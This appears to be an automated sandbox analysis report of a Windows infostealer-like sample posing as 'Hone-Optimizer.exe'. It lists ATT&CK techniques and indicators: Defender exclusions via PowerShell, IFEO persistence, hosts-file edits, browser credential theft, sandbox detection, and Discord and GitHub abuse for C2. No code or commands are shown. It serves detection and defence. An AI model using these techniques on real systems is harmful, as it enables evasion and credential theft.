07f228e81a538261d88699e099867204dc8fa6ba44590a75bd6c17bf50217b65

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components	Process not Found

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1772	powershell.exe
5112	powershell.exe
2452	powershell.exe
4516	powershell.exe
4432	powershell.exe
2108	Process not Found
3688	powershell.exe
4304	powershell.exe
3156	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Hone-Optimizer.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 7 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions\IoPriority = "3"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions\CpuPriorityClass = "4"	reg.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation	rundll32.exe

Executes dropped EXE 3 IoCs

pid	Process
3276	bound.exe
3156	rar.exe
2840	dismhost.exe

Loads dropped DLL 35 IoCs

pid	Process
3632	Hone-Optimizer.exe
3632	Hone-Optimizer.exe
3632	Hone-Optimizer.exe
3632	Hone-Optimizer.exe
3632	Hone-Optimizer.exe
3632	Hone-Optimizer.exe
3632	Hone-Optimizer.exe
3632	Hone-Optimizer.exe
3632	Hone-Optimizer.exe
3632	Hone-Optimizer.exe
3632	Hone-Optimizer.exe
3632	Hone-Optimizer.exe
3632	Hone-Optimizer.exe
3632	Hone-Optimizer.exe
3632	Hone-Optimizer.exe
3632	Hone-Optimizer.exe
2840	dismhost.exe
2840	dismhost.exe
2840	dismhost.exe
2840	dismhost.exe
2840	dismhost.exe
2840	dismhost.exe
2840	dismhost.exe
2840	dismhost.exe
2840	dismhost.exe
2840	dismhost.exe
2840	dismhost.exe
2840	dismhost.exe
2840	dismhost.exe
2840	dismhost.exe
2840	dismhost.exe
2840	dismhost.exe
2840	dismhost.exe
2840	dismhost.exe
2840	dismhost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Enumerates connected drives 3 TTPs 12 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\D:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\D:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\D:	Process not Found
File opened (read-only)	\??\D:	Process not Found
File opened (read-only)	\??\D:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\D:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
24	discord.com
25	discord.com
33	raw.githubusercontent.com
34	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
22	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 28 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
4416	powercfg.exe
1644	powercfg.exe
4876	powercfg.exe
2364	powercfg.exe
116	powercfg.exe
4484	powercfg.exe
5116	powercfg.exe
1400	powercfg.exe
4592	powercfg.exe
408	powercfg.exe
1844	Process not Found
1116	powercfg.exe
1936	powercfg.exe
4540	powercfg.exe
4712	powercfg.exe
2096	powercfg.exe
224	powercfg.exe
3828	powercfg.exe
4000	Process not Found
4376	powercfg.exe
2388	powercfg.exe
2836	Process not Found
2288	Process not Found
4436	Process not Found
3688	powercfg.exe
4348	powercfg.exe
4220	powercfg.exe
2728	powercfg.exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
1212	tasklist.exe
216	tasklist.exe
2140	tasklist.exe
1084	tasklist.exe

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0029000000045037-22.dat	upx
behavioral1/memory/3632-26-0x00007FFB443B0000-0x00007FFB44999000-memory.dmp	upx
behavioral1/files/0x0026000000045020-28.dat	upx
behavioral1/files/0x0026000000045035-32.dat	upx
behavioral1/memory/3632-33-0x00007FFB5D070000-0x00007FFB5D07F000-memory.dmp	upx
behavioral1/memory/3632-31-0x00007FFB53770000-0x00007FFB53793000-memory.dmp	upx
behavioral1/files/0x0022000000045027-39.dat	upx
behavioral1/memory/3632-41-0x00007FFB53570000-0x00007FFB5359D000-memory.dmp	upx
behavioral1/files/0x002200000004501e-42.dat	upx
behavioral1/memory/3632-45-0x00007FFB57C30000-0x00007FFB57C49000-memory.dmp	upx
behavioral1/files/0x0026000000045032-44.dat	upx
behavioral1/memory/3632-48-0x00007FFB52CE0000-0x00007FFB52D03000-memory.dmp	upx
behavioral1/files/0x002900000004503a-47.dat	upx
behavioral1/memory/3632-50-0x00007FFB43F70000-0x00007FFB440E7000-memory.dmp	upx
behavioral1/files/0x0022000000045029-51.dat	upx
behavioral1/memory/3632-53-0x00007FFB535B0000-0x00007FFB535C9000-memory.dmp	upx
behavioral1/files/0x0029000000045039-54.dat	upx
behavioral1/memory/3632-57-0x00007FFB57A20000-0x00007FFB57A2D000-memory.dmp	upx
behavioral1/files/0x0026000000045033-56.dat	upx
behavioral1/files/0x0026000000045034-59.dat	upx
behavioral1/memory/3632-61-0x00007FFB4A4E0000-0x00007FFB4A513000-memory.dmp	upx
behavioral1/files/0x0029000000045036-60.dat	upx
behavioral1/memory/3632-64-0x00007FFB443B0000-0x00007FFB44999000-memory.dmp	upx
behavioral1/memory/3632-67-0x00007FFB53770000-0x00007FFB53793000-memory.dmp	upx
behavioral1/memory/3632-66-0x00007FFB43760000-0x00007FFB4382D000-memory.dmp	upx
behavioral1/files/0x0022000000045023-68.dat	upx
behavioral1/memory/3632-70-0x00007FFB52BD0000-0x00007FFB52BE4000-memory.dmp	upx
behavioral1/memory/3632-74-0x00007FFB536D0000-0x00007FFB536DD000-memory.dmp	upx
behavioral1/files/0x002900000004503b-77.dat	upx
behavioral1/memory/3632-78-0x00007FFB43640000-0x00007FFB4375C000-memory.dmp	upx
behavioral1/files/0x0022000000045028-72.dat	upx
behavioral1/memory/3632-65-0x00007FFB43830000-0x00007FFB43D50000-memory.dmp	upx
behavioral1/memory/3632-109-0x00007FFB52CE0000-0x00007FFB52D03000-memory.dmp	upx
behavioral1/memory/3632-113-0x00007FFB43F70000-0x00007FFB440E7000-memory.dmp	upx
behavioral1/memory/3632-119-0x00007FFB535B0000-0x00007FFB535C9000-memory.dmp	upx
behavioral1/memory/3632-199-0x00007FFB4A4E0000-0x00007FFB4A513000-memory.dmp	upx
behavioral1/memory/3632-238-0x00007FFB43830000-0x00007FFB43D50000-memory.dmp	upx
behavioral1/memory/3632-239-0x00007FFB43760000-0x00007FFB4382D000-memory.dmp	upx
behavioral1/memory/3632-256-0x00007FFB443B0000-0x00007FFB44999000-memory.dmp	upx
behavioral1/memory/3632-262-0x00007FFB43F70000-0x00007FFB440E7000-memory.dmp	upx
behavioral1/memory/3632-257-0x00007FFB53770000-0x00007FFB53793000-memory.dmp	upx
behavioral1/memory/3632-312-0x00007FFB52CE0000-0x00007FFB52D03000-memory.dmp	upx
behavioral1/memory/3632-318-0x00007FFB43760000-0x00007FFB4382D000-memory.dmp	upx
behavioral1/memory/3632-317-0x00007FFB43830000-0x00007FFB43D50000-memory.dmp	upx
behavioral1/memory/3632-316-0x00007FFB4A4E0000-0x00007FFB4A513000-memory.dmp	upx
behavioral1/memory/3632-315-0x00007FFB57A20000-0x00007FFB57A2D000-memory.dmp	upx
behavioral1/memory/3632-314-0x00007FFB535B0000-0x00007FFB535C9000-memory.dmp	upx
behavioral1/memory/3632-313-0x00007FFB43F70000-0x00007FFB440E7000-memory.dmp	upx
behavioral1/memory/3632-311-0x00007FFB57C30000-0x00007FFB57C49000-memory.dmp	upx
behavioral1/memory/3632-310-0x00007FFB53570000-0x00007FFB5359D000-memory.dmp	upx
behavioral1/memory/3632-309-0x00007FFB5D070000-0x00007FFB5D07F000-memory.dmp	upx
behavioral1/memory/3632-308-0x00007FFB53770000-0x00007FFB53793000-memory.dmp	upx
behavioral1/memory/3632-307-0x00007FFB443B0000-0x00007FFB44999000-memory.dmp	upx
behavioral1/memory/3632-306-0x00007FFB43640000-0x00007FFB4375C000-memory.dmp	upx
behavioral1/memory/3632-305-0x00007FFB536D0000-0x00007FFB536DD000-memory.dmp	upx
behavioral1/memory/3632-304-0x00007FFB52BD0000-0x00007FFB52BE4000-memory.dmp	upx

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp	TiWorker.exe

Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs

Command interpreters often include specific commands/flags that ignore errors and other hangups.

defense_evasion

Ignore Process Interrupts

T1564.011

pid	Process
2108	Process not Found

Launches sc.exe 34 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1960	Process not Found
3340	sc.exe
3180	sc.exe
788	sc.exe
2232	sc.exe
1540	sc.exe
4244	sc.exe
2328	Process not Found
3740	sc.exe
4568	sc.exe
4516	sc.exe
1816	sc.exe
4820	sc.exe
3652	sc.exe
2376	sc.exe
2580	sc.exe
3832	sc.exe
1844	sc.exe
3380	sc.exe
2636	sc.exe
1824	sc.exe
4808	sc.exe
4828	sc.exe
2624	Process not Found
4536	Process not Found
2304	Process not Found
896	sc.exe
4020	sc.exe
1164	sc.exe
4368	Process not Found
3012	Process not Found
544	sc.exe
4048	sc.exe
1248	Process not Found

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InstallUtil.exe

System Time Discovery 1 TTPs 1 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
1116	Process not Found

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	Process not Found

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

pid	Process
4476	WMIC.exe
4692	WMIC.exe
1264	WMIC.exe

Gathers network information 2 TTPs 4 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

Command and Scripting Interpreter

T1059

pid	Process
4304	Process not Found
5112	Process not Found
1904	Process not Found
3756	Process not Found

Kills process with taskkill 1 IoCs

evasion

pid	Process
2984	Process not Found

Modifies Internet Explorer settings 1 TTPs 8 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\GPU	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\GPU	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\GPU	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\GPU	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	Process not Found

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Process not Found
